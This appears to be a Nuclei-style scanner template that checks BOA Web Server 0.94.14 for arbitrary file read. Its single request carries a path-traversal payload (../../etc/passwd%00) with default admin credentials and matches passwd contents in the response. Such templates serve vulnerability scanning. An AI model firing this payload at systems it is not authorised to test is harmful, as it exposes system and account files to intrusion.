id: BOA-Web-fileRead

info:
  name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
  author: Str1am
  severity: high
  reference: https://www.exploit-db.com/exploits/42290/
  tags: BOA,fileRead

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root"
          - "/bin"
          - "daemon:x"
        part: body
        condition: and
